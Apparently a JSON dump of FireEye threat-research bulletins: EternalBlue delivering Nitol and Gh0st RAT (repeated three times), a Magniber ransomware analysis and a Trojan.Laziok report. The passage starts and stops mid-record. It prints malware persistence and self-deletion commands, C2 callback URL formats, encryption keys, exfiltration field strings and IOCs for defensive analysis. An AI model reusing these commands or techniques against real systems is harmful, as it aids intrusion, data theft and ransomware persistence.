dropper downloads the Gh0st RAT binary from beiyeye.401hk[.]com (Figure 5).\n\n**![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/image5.png)**\n\nFigure 5. Gh0st RAT C2 communication\n\nThe first five bytes in the header of the Gh0st RAT traffic is an indication of the Gh0st variant used. Historically we have seen wide-spread usage of variants employing the \u2018**cb1st**\u2019 magic header against the Education, Energy/Utilities, Manufacturing, Services/Consulting, and Telecom industries. For more information on this and other widely used variants of Gh0st RAT, please review [_GH0ST in the Machine: GH0ST RAT Remains Active in Financial Services Sector_](<https://mysight.isightpartners.com/report/full/16-00006116>) available on our subscription MySight portal.\n\nThe Gh0St RAT sample observed in this attack, as well as other associated samples identified by FireEye are all signed with a common digital certificate purporting to be from \u5317\u4eac\u7814\u521b\u8fbe\u79d1\u6280\u6709\u9650\u516c\u53f8 (Beijing Institute of Science and Technology Co., Ltd). Stolen or illegitimately purchased code signing certificates are increasingly used to lend legitimacy to malware. See the appendix for full details on the observed code signing certificate.\n\n##### **Conclusion**\n\nThe addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities. In the coming weeks and months, we expect to see more attackers leveraging these vulnerabilities and to spread such infections with different payloads. It is critical that Microsoft Windowsusers patch their machines and update to the latest software versions as soon as possible.\n\n##### Acknowledgements\n\nFireEye Labs authors would like to thank Shahzad Ahmad and Kean Siong Tan for their contributions in this discovery.\n\nIOCs\n\nSHA sum \ncba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946 \n4f49e17b457ef202ab0be905691ef2b2d2b0a086a7caddd1e70dd45e5ed3b309\n\nDownloader\n\n121.201.9.204:45988 / taskmgr.exe (Nitol) \nbeiyeye.401hk[.]com:1541 / systemUpdate.exe (Gh0st)\n\nC2\n\nhackqz.f3322.org (Nitol) \n120.209.40.157:8880 (Nitol) \nbj6po.a1free9bird[.]com (Gh0st) \n \nCode-Signing Certificate\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/Certificate.jpg)\n", "edition": 2, "cvss3": {}, "published": "2017-06-02T09:00:00", "type": "fireeye", "title": "Threat actors leverage EternalBlue exploit to deliver non-WannaCry payloads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2017-06-02T09:00:00", "id": "FIREEYE:1199DD4FBE70F58C3062B0B2270EAA03", "href": "https://www.fireeye.com/blog/threat-research/2017/05/threat-actors-leverage-eternalblue-exploit-to-deliver-non-wannacry-payloads.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:05", "description": "The \u201cEternalBlue\u201d exploit ([MS017-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) was initially used by WannaCry ransomware and Adylkuzz cryptocurrency miner. Now more threat actors are leveraging the vulnerability in [Microsoft Server Message Block (SMB) protocol](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) \u2013 this time to distribute Backdoor.Nitol and Trojan Gh0st RAT.\n\nFireEye Dynamic Threat Intelligence (DTI) has historically observed similar payloads delivered via exploitation of CVE-2014-6332 vulnerability as well as in some email spam campaigns using [powershell commands](<https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html>). Specifically, Backdoor.Nitol has also been linked to campaigns involving a remote code execution vulnerability using the ADODB.Stream ActiveX Object that affects older versions of Internet Explorer. Both payloads have previously been involved in targeted [cyber-attacks against the aerospace and defense industry](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-aerospace.pdf>).\n\nWe observed lab machines vulnerable to SMB exploit were attacked by a threat actor using the EternalBlue exploit to gain shell access to the machine.\n\nFigure 1 shows an EternalBlue exploitation attempt.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/image1.png)\n\nFigure 1. Network traffic showing EternalBlue attack attempt\n\nThe initial exploit technique used at the [SMB level](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) is similar to what we have been seen in [WannaCry campaigns](<https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html>); however, once a machine is successfully infected, this particular attack opens a shell to write instructions into a VBScript file and then executes it to fetch the payload on another server.\n\nWe have observed the same EternalBlue and VBScript combination used to distribute Gh0st RAT in Singapore, as well as Backdoor.Nitol being delivered in the South Asia region.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/image2.jpg)\n\nFigure 2. VBScript instructions in \u20181.vbs\u2019\n\nThe full VBScript instructions can be seen in Figure 2. The attacker echoes instructions into a new \u20181.vbs\u2019 file to be executed later. These instructions fetch the payload \u2018taskmgr.exe\u2019 from another server in a synchronous call (as indicated by the second parameter \u20180\u2019). This action creates an ActiveX object ADODB.Stream, which allows reading the file coming from the server and writes the result of the binary data in a stream. Mode \u20183\u2019 is used for read/write permissions while type \u20181\u2019 indicates stream as binary data. Thereafter, it saves the binary stream to a location at \u201cc:/\u201d with option \u20182\u2019 in order to overwrite any binary with the same name at that location.\n\nLater, we see that \u20181.vbs\u2019 executes through a command-line version of the Windows Script Host which deletes the vbs file. Once the executable is fetched and saved, the attacker uses a shell to launch the backdoor from the saved location.\n\nFigure 3 shows Backdoor.Nitol being downloaded and infecting the machine.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/image3.jpg)\n\nFigure 3. Network traffic showing Backdoor.Nitol download\n\nThe command and control (C2) for the Backdoor.Nitol sample is hackqz.f3322[.]org (120.209.40.157). See Figure 4.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/image4.png)\n\nFigure 4. Backdoor.Nitol C2 communication\n\nThe other malware that we\u2019ve observed being deployed in this manner is Gh0st RAT. The observed dropper downloads the Gh0st RAT binary from beiyeye.401hk[.]com (Figure 5).\n\n**![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/image5.png)**\n\nFigure 5. Gh0st RAT C2 communication\n\nThe first five bytes in the header of the Gh0st RAT traffic is an indication of the Gh0st variant used. Historically we have seen wide-spread usage of variants employing the \u2018**cb1st**\u2019 magic header against the Education, Energy/Utilities, Manufacturing, Services/Consulting, and Telecom industries. For more information on this and other widely used variants of Gh0st RAT, please review [_GH0ST in the Machine: GH0ST RAT Remains Active in Financial Services Sector_](<https://mysight.isightpartners.com/report/full/16-00006116>) available on our subscription MySight portal.\n\nThe Gh0St RAT sample observed in this attack, as well as other associated samples identified by FireEye are all signed with a common digital certificate purporting to be from \u5317\u4eac\u7814\u521b\u8fbe\u79d1\u6280\u6709\u9650\u516c\u53f8 (Beijing Institute of Science and Technology Co., Ltd). Stolen or illegitimately purchased code signing certificates are increasingly used to lend legitimacy to malware. See the appendix for full details on the observed code signing certificate.\n\n##### **Conclusion**\n\nThe addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities. In the coming weeks and months, we expect to see more attackers leveraging these vulnerabilities and to spread such infections with different payloads. It is critical that Microsoft Windowsusers patch their machines and update to the latest software versions as soon as possible.\n\n##### Acknowledgements\n\nFireEye Labs authors would like to thank Shahzad Ahmad and Kean Siong Tan for their contributions in this discovery.\n\nIOCs\n\nSHA sum \ncba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946 \n4f49e17b457ef202ab0be905691ef2b2d2b0a086a7caddd1e70dd45e5ed3b309\n\nDownloader\n\n121.201.9.204:45988 / taskmgr.exe (Nitol) \nbeiyeye.401hk[.]com:1541 / systemUpdate.exe (Gh0st)\n\nC2\n\nhackqz.f3322.org (Nitol) \n120.209.40.157:8880 (Nitol) \nbj6po.a1free9bird[.]com (Gh0st) \n \nCode-Signing Certificate\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/Certificate.jpg)\n", "cvss3": {}, "published": "2017-06-02T13:00:00", "type": "fireeye", "title": "Threat actors leverage EternalBlue exploit to deliver non-WannaCry payloads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2017-06-02T13:00:00", "id": "FIREEYE:BA5D99C38621C3A47D6895E339B11FE4", "href": "https://www.fireeye.com/blog/threat-research/2017/05/threat-actors-leverage-eternalblue-exploit-to-deliver-non-wannacry-payloads.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-31T00:18:21", "description": "The \u201cEternalBlue\u201d exploit ([MS017-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) was initially used by WannaCry ransomware and Adylkuzz cryptocurrency miner. Now more threat actors are leveraging the vulnerability in [Microsoft Server Message Block (SMB) protocol](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) \u2013 this time to distribute Backdoor.Nitol and Trojan Gh0st RAT.\n\nFireEye Dynamic Threat Intelligence (DTI) has historically observed similar payloads delivered via exploitation of CVE-2014-6332 vulnerability as well as in some email spam campaigns using [powershell commands](<https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html>). Specifically, Backdoor.Nitol has also been linked to campaigns involving a remote code execution vulnerability using the ADODB.Stream ActiveX Object that affects older versions of Internet Explorer. Both payloads have previously been involved in targeted [cyber-attacks against the aerospace and defense industry](<https://www.fireeye.com/content/dam/fireeye-www/current-threats/pdfs/ib-aerospace.pdf>).\n\nWe observed lab machines vulnerable to SMB exploit were attacked by a threat actor using the EternalBlue exploit to gain shell access to the machine.\n\nFigure 1 shows an EternalBlue exploitation attempt.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/image1.png)\n\nFigure 1. Network traffic showing EternalBlue attack attempt\n\nThe initial exploit technique used at the [SMB level](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) is similar to what we have been seen in [WannaCry campaigns](<https://www.fireeye.com/blog/threat-research/2017/05/wannacry-malware-profile.html>); however, once a machine is successfully infected, this particular attack opens a shell to write instructions into a VBScript file and then executes it to fetch the payload on another server.\n\nWe have observed the same EternalBlue and VBScript combination used to distribute Gh0st RAT in Singapore, as well as Backdoor.Nitol being delivered in the South Asia region.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/image2.jpg)\n\nFigure 2. VBScript instructions in \u20181.vbs\u2019\n\nThe full VBScript instructions can be seen in Figure 2. The attacker echoes instructions into a new \u20181.vbs\u2019 file to be executed later. These instructions fetch the payload \u2018taskmgr.exe\u2019 from another server in a synchronous call (as indicated by the second parameter \u20180\u2019). This action creates an ActiveX object ADODB.Stream, which allows reading the file coming from the server and writes the result of the binary data in a stream. Mode \u20183\u2019 is used for read/write permissions while type \u20181\u2019 indicates stream as binary data. Thereafter, it saves the binary stream to a location at \u201cc:/\u201d with option \u20182\u2019 in order to overwrite any binary with the same name at that location.\n\nLater, we see that \u20181.vbs\u2019 executes through a command-line version of the Windows Script Host which deletes the vbs file. Once the executable is fetched and saved, the attacker uses a shell to launch the backdoor from the saved location.\n\nFigure 3 shows Backdoor.Nitol being downloaded and infecting the machine.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/image3.jpg)\n\nFigure 3. Network traffic showing Backdoor.Nitol download\n\nThe command and control (C2) for the Backdoor.Nitol sample is hackqz.f3322[.]org (120.209.40.157). See Figure 4.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/image4.png)\n\nFigure 4. Backdoor.Nitol C2 communication\n\nThe other malware that we\u2019ve observed being deployed in this manner is Gh0st RAT. The observed dropper downloads the Gh0st RAT binary from beiyeye.401hk[.]com (Figure 5).\n\n**![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/image5.png)**\n\nFigure 5. Gh0st RAT C2 communication\n\nThe first five bytes in the header of the Gh0st RAT traffic is an indication of the Gh0st variant used. Historically we have seen wide-spread usage of variants employing the \u2018**cb1st**\u2019 magic header against the Education, Energy/Utilities, Manufacturing, Services/Consulting, and Telecom industries. For more information on this and other widely used variants of Gh0st RAT, please review [_GH0ST in the Machine: GH0ST RAT Remains Active in Financial Services Sector_](<https://mysight.isightpartners.com/report/full/16-00006116>) available on our subscription MySight portal.\n\nThe Gh0St RAT sample observed in this attack, as well as other associated samples identified by FireEye are all signed with a common digital certificate purporting to be from \u5317\u4eac\u7814\u521b\u8fbe\u79d1\u6280\u6709\u9650\u516c\u53f8 (Beijing Institute of Science and Technology Co., Ltd). Stolen or illegitimately purchased code signing certificates are increasingly used to lend legitimacy to malware. See the appendix for full details on the observed code signing certificate.\n\n##### **Conclusion**\n\nThe addition of the EternalBlue exploit to Metasploit has made it easy for threat actors to exploit these vulnerabilities. In the coming weeks and months, we expect to see more attackers leveraging these vulnerabilities and to spread such infections with different payloads. It is critical that Microsoft Windowsusers patch their machines and update to the latest software versions as soon as possible.\n\n##### Acknowledgements\n\nFireEye Labs authors would like to thank Shahzad Ahmad and Kean Siong Tan for their contributions in this discovery.\n\nIOCs\n\nSHA sum \ncba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946 \n4f49e17b457ef202ab0be905691ef2b2d2b0a086a7caddd1e70dd45e5ed3b309\n\nDownloader\n\n121.201.9.204:45988 / taskmgr.exe (Nitol) \nbeiyeye.401hk[.]com:1541 / systemUpdate.exe (Gh0st)\n\nC2\n\nhackqz.f3322.org (Nitol) \n120.209.40.157:8880 (Nitol) \nbj6po.a1free9bird[.]com (Gh0st) \n \nCode-Signing Certificate\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Every%20tom%20dick%20and%20harry%20ali/Certificate.jpg)\n", "edition": 2, "cvss3": {}, "published": "2017-06-02T09:00:00", "type": "fireeye", "title": "Threat actors leverage EternalBlue exploit to deliver non-WannaCry payloads", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-6332"], "modified": "2017-06-02T09:00:00", "id": "FIREEYE:6381573A131149D7EF323EABC685A028", "href": "https://www.fireeye.com/blog/threat-research/2017/05/threat-actors-leverage-eternalblue-exploit-to-deliver-non-wannacry-payloads.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:22", "description": "#### Introduction\n\nExploit kit (EK) use has been on the decline since late 2016; however, certain activity remains consistent. The Magnitude Exploit Kit is one such example that continues to affect users, particularly in the APAC region.\n\nIn Figure 1, which is based on FireEye Dynamic threat Intelligence (DTI) reports shared in March 2017, we can see the regions affected by Magnitude EK activity during the last three months of 2016 and the first three months of 2017.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Magniber/Fig1.png) \nFigure 1: Magnitude EK distribution as seen in March 2017\n\nThis trend continued until late September 2017, when we saw Magnitude EK focus primarily on the APAC region, with a large chunk targeting South Korea. Magnitude EK activity then fell off the radar until Oct. 15, 2017, when it came back and began focusing solely on South Korea. Previously it had been distributing Cerber ransomware, but Cerber distribution has declined (we have also seen a decline of Cerber being distributed via email) and now it is distributing ransomware known as Magniber. \n\n#### Infection\n\nThe first reappearance of Magnitude EK on Oct. 15 came as a malvertising redirection from the domain: fastprofit[.]loan. The infection chain is shown in Figure 2.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Magniber/Fig2.png) \nFigure 2: Infection chain\n\nThe Magnitude EK landing page consisted of CVE-2016-0189, which was first reported by FireEye as being used in [Neutrino Exploit Kit](<https://www.fireeye.com/blog/threat-research/2016/07/exploit_kits_quickly.html>) after it was patched. Figure 3 shows the landing page and CVE usage.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Magniber/Fig3.png) \nFigure 3: Magnitude EK landing page\n\nAs seen previously with Magnitude EK, the payload is downloaded as a plain EXE (see Figure 4) and domain infrastructure is hosted on the following server:\n\n\u201cApache/2.2.15 (CentOS) DAV/2 mod_fastcgi/2.4.6\u201d\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Magniber/Fig4.png) \nFigure 4: Magnitude payload header and plain MZ response\n\n#### Payload\n\nIn the initial report [published by our colleagues at Trend Micro](<http://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-now-targeting-korea-with-magniber-ransomware/>), the ransomware being distributed is referred to as Magniber. These ransomware payloads only seem to target Korean systems, since they won\u2019t execute if the system language is not Korean.\n\nMagniber encrypts user data using the AES128. The sample used (dc2a2b84da359881b9df1ec31d03c715) for this analysis was pulled from our DTI system when the campaign was active. Of note, this sample differs from the hash shared publically by Trend Micro, but the two exhibit the same behavior and share the infection vector, and both were distributed around the same time.\n\nThe malware contains a binary payload in its resource section encrypted in reverse using RC4. It starts unpacking it from the end of the buffer to its start. Reverse RC4 decryption keys are 30 bytes long and also contain non-ASCII characters. They are as follows:\n\n * dc2a2b84da359881b9df1ec31d03c715 RC4 key:\n * { 0x6b, 0xfe, 0xc4, 0x23, 0xac, 0x50, 0xd7, 0x91, 0xac, 0x06, 0xb0, 0xa6, 0x65, 0x89, 0x6a, 0xcc, 0x05, 0xba, 0xd7, 0x83, 0x04, 0x90, 0x2a, 0x93, 0x8d, 0x2d, 0x5c, 0xc7, 0xf7, 0x3f }\n\nThe malware calls _GetSystemDefaultUILanguage_, and if the system language is not Korean, it exits (instructions can be seen in Figure 5). After unpacking in memory, the malware starts executing the unpacked payload.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Magniber/Fig5.png) \nFigure 5: Language check targeted at Korea\n\nA mutex with name \"ihsdj\" is created to prevent multiple executions. The payload then generates a pseudorandom 19-character string based on the CPU clock from multiple _GetTickCount_ calls. The string is then used to create a file in the user\u2019s %TEMP% directory (e.g. \"xxxxxxxxxxxxxxxxxxx.ihsdj\"), which contains the IV (Initialization Vector) for the AES128 encryption and a copy of the malware itself with the name \"ihsdj.exe\".\n\nNext, the malware constructs 4 URLs for callback. It uses the 19-character long pseudorandom string it generated, and the following domains to create the URLs:\n\n * bankme.date\n * jobsnot.services\n * carefit.agency\n * hotdisk.world\n\nIn order to evade sandbox systems, the malware checks to see if it's running inside a VM and appends the result to the URL callback. It does this by sandwiching and executing CPUID instructions (shown in Figure 6) between RDTSC calls, forcing VMEXIT.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Magniber/Fig6.png) \nFigure 6: CPUID instruction to detect VM presence\n\nThe aforementioned VM check is done multiple times to gather the average execution time of the CPUID, and if the average execution time is greater than 1000, it considers the system to be a VM. In case the test fails and the malware thinks the system is a VM, a \"1\" is appended at the end of the URL (see Figure 7); otherwise, \"0\" is appended. The format of the URL is as follows:\n\n * http://[19 character pseudorandom string].[callback domain]/new[0 or 1]\n\nExamples of this would be:\n\n * http://7o12813k90oggw10277.bankme[.]date/new1\n * http://4bg8l9095z0287fm1j5.bankme[.]date/new0\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Magniber/Fig7.png) \nFigure 7: Command and control communication\n\nIf the malware is executed a second time after encryption, the callback URL ends in \"end0\" or \"end1\" instead of \"new\". An example of this would be:\n\n * hxxp://j2a3y50mi0a487230v1.bankme[.]date/end1\n\nThe malware then starts to encrypt user files on the system, renaming them by adding a \".ihsdj\" extension to the end. The AES128 Key and IV for the sample analyzed are listed:\n\n * IV: EP866p5M93wDS513\n * AES128 Key: S25943n9Gt099y4K\n\nA text file \"READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt\" is created in the user\u2019s %TEMP% directory and shown to the user. The ransom message is shown in Figure 8.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Magniber/Fig8.png) \nFigure 8: Ransom message for the infected user\n\nThe malware also adds scheduled tasks to run its copy from %TEMP% with compatibility assistant, and loads the user message as follows:\n\n * schtasks /create /SC MINUTE /MO 15 /tn ihsdj /TR \"pcalua.exe -a %TEMP%\\ihsdj.exe\n * schtasks /create /SC MINUTE /MO 15 /tn xxxxxxxxxxxxxxxxxxx /TR %TEMP%\\READ_ME_FOR_DECRYPT_xxxxxxxxxxxxxxxxxxx_.txt\n\nThe malware then issues a command to delete itself after exiting, using the following local ping to provide delay for the deletion:\n\n * cmd /c ping localhost -n 3 > nul & del C:\\PATH\\MALWARE.EXE)\n\nFigure 9 contains the Python code for unpacking the malware payload, which is encrypted using RC4 in reverse.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Magniber/Fig9.png) \nFigure 9: Python script for unpacking malware payload\n\n#### Conclusion\n\nRansomware is a significant threat to enterprises. While the current threat landscape suggests a large portion of attacks are coming from emails, exploit kits continue to put users at risk \u2013 especially those running old software versions and not using ad blockers. Enterprises need to make sure their network nodes are fully patched.\n\nAll FireEye products detect the malware in our MVX engine. Additionally, [FireEye NX](<https://www.fireeye.com/products/nx-network-security-products.html>) blocks delivery at the infection point.\n\n#### IOCs\n\n##### Malware Sample Hash\n\n * dc2a2b84da359881b9df1ec31d03c715 (decryption key shared)\n\n##### Malverstiser Domains\n\n * fastprofit[.]loan\n * fastprofit[.]me\n\n##### EK Domain Examples\n\n * 3e37i982wb90j.fileice[.]services\n * a3co5a8iab2x24g90.helpraw[.]schule\n * 2i1f3aadm8k.putback[.]space\n\n##### Command and Control Domains\n\n * 3ee9fuop6ta4d6d60bt.bankme.date\n * 3ee9fuop6ta4d6d60bt.jobsnot.services\n * 3ee9fuop6ta4d6d60bt.carefit.agency\n * 3ee9fuop6ta4d6d60bt.hotdisk.world\n", "edition": 2, "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-10-19T16:06:00", "type": "fireeye", "title": "Magniber Ransomware Wants to Infect Only the Right People", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0189"], "modified": "2017-10-19T16:06:00", "id": "FIREEYE:BE50F5D8A44B5F476D7A63CB23072BEA", "href": "https://www.fireeye.com/blog/threat-research/2017/10/magniber-ransomware-infects-only-the-right-people.html", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-11-04T00:25:44", "description": "##### **Introduction**\n\nThrough our multi-flow detection capability, we recently identified malicious actors spreading Trojan.Laziok malware via Google Docs. We observed that the attackers managed to upload the payload to Google Docs in March 2016. During the brief time it was live, users accessing the malicious page from Internet Explorer (versions 3 to 11) would have become the unwilling hosts for the infostealer payload without any security warning. After we alerted Google about its presence, they quickly cleaned it and the original URL involved in propagation also went down.\n\n##### **The Payload**\n\nTrojan.Laziok reportedly serves as a reconnaissance tool that attackers use to collect information about systems they have compromised. It has been seen previously in a cyber espionage campaign targeting the energy sector, particularly in the Middle East[i]. In that campaign, the malware was spread using spam emails with malicious attachments exploiting the CVE-2012-0158 vulnerability.\n\nThe techniques used for delivery in this case involve exploiting users running versions of Internet Explorer that support VBScript.\n\n##### **Attack Delivery Point**\n\nThe attacker stored the first stage of the attack on the Polish domain hosting site cba[.]pl. As seen in Figure 1, the first stage initiates the attack by running obfuscated JavaScript from www.younglean. cba[.]pl/lean/.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Laziok/Fig1.jpg)\n\nFigure 1. Obfuscated code shown in the response\n\nOnce decoded, the JavaScript unpacks and runs vulnerability CVE-2014-6332 through VBScript execution in Internet Explorer (versions 3 to 11), exploiting the memory corruption vulnerability in Windows Object Linking and Embedding (OLE) Automation to bypass operating system security utilities and other protections and thus enabling attackers to enter into \u201dGodMode\u201d function. CVE-2014-6332 usage, along with GodMode privileges abuse, has been used as a combination since late 2014 via a known PoC[ii], as seen Figures 2a and 2b:\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Laziok/Fig2a.jpg)\n\nFigure 2a. CVE-2014-6332 usage\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Laziok/Fig2b.jpg)\n\nFigure 2b. Function call to runmumaa() after \u201cGodMode\u201d access changing the safemode flags\n\nNext, the runmaa() function downloads the malicious payload from Google Docs through PowerShell. PowerShell is used to download malware and execute it inside defined %APPDATA% environment variable path via DownloadFile and ShellExecute commands. All VBScript instructions and PowerShell scripts are part of the obfuscated script inside document.write(unescape), shown in Figure 1.\n\nPowerShell is also useful for bypassing anti-virus software because it is able to inject payloads directly in memory. We have previously discussed [active PowerShell data stealing campaigns from Russia](<mailto:https://www.fireeye.com/blog/threat-research/2015/12/uncovering_activepower.html>)[iii]. It seems the technique is still popular among campaigns involving infostealers, and this one was able to evade Google Docs security checks. The payload download link from Google Docs \u2013 seen in Figure 3 showing the de-obfuscated code \u2013 fetched live malware for victims who ended up on the aforementioned Polish website.\n\n![](https://www.fireeye.com/content/dam/fireeye-www/blog/images/Laziok/Fig3.jpg)\n\nFigure 3. Using PowerShell to fetch payload hosted on Google docs link\n\n##### **Payload Details**\n\nThe downloaded payload is infostealer Trojan.Laziok, as evidenced by its callback trace and the presence of the following data:\n\n00406471 PUSH 21279964.00414EED ASCII \"open\" \n0040649C MOV EDX,21279964.004166A8 ASCII \"idcontact.php?COMPUTER=\" \n004064B1 MOV EDX,21279964.00415D6D ASCII \"&steam=\" \n004064D2 MOV EDX,21279964.00416D96 ASCII \"&origin=\" \n004064F3 MOV EDX,21279964.00416659 ASCII \"&webnavig=\" \n00406514 MOV EDX,21279964.00416B17 ASCII \"&java=\" \n00406535 MOV EDX,21279964.00415601 ASCII \"&net=\" \n00406556 MOV EDX,21279964.00414F76 ASCII \"&memoireRAMbytes=\" \n0040656B MOV EDX,21279964.0041628C ASCII \"&diskhard=\" \n0040658E MOV EDX,21279964.00414277 ASCII \"&avname=\" \n004065AF MOV EDX,21279964.00416BFC ASCII \"&parefire=\" \n004065D0 MOV EDX,21279964.0041474A ASCII \"&install=\" \n004065E5 MOV EDX,21279964.00414E12 ASCII \"&gpu=\" \n00406606 MOV EDX,21279964.004164B7 ASCII \"&cpu=\" \n00406659 MOV EDX,21279964.004170F9 ASCII \"bkill.php\" \n004066B9 MOV EDX,21279964.00415B79 ASCII \"0000025C00000C6B000008BB000006ED0000088900000453000004CE0000054100000B75\" \n004066ED MOV EDX,21279964.004149CD ASCII \"install_info.php\" \n00406735 MOV EDX,21279964.00415951 ASCII \"pinginfo.php\" \n00406772 MOV EDX,21279964.00416B6B ASCII \"get.php?IP=\" \n00406787 MOV EDX,21279964.0041463F ASCII \"&COMPUTER=\" \n0040679C MOV EDX,21279964.00416DF5 ASCII \"&OS=\" \n004067B1 MOV EDX,21279964.00415CB8 ASCII \"&COUNTRY=\" \n004067C6 MOV EDX,21279964.00416069 ASCII \"&HWID=\" \n004067DB MOV EDX,21279964.00414740 ASCII \"&INSTALL=\" \n004067F0 MOV EDX,21279964.00415BE3 ASCII \"&PING=\" \n00406805 MOV EDX,21279964.004158E2 ASCII 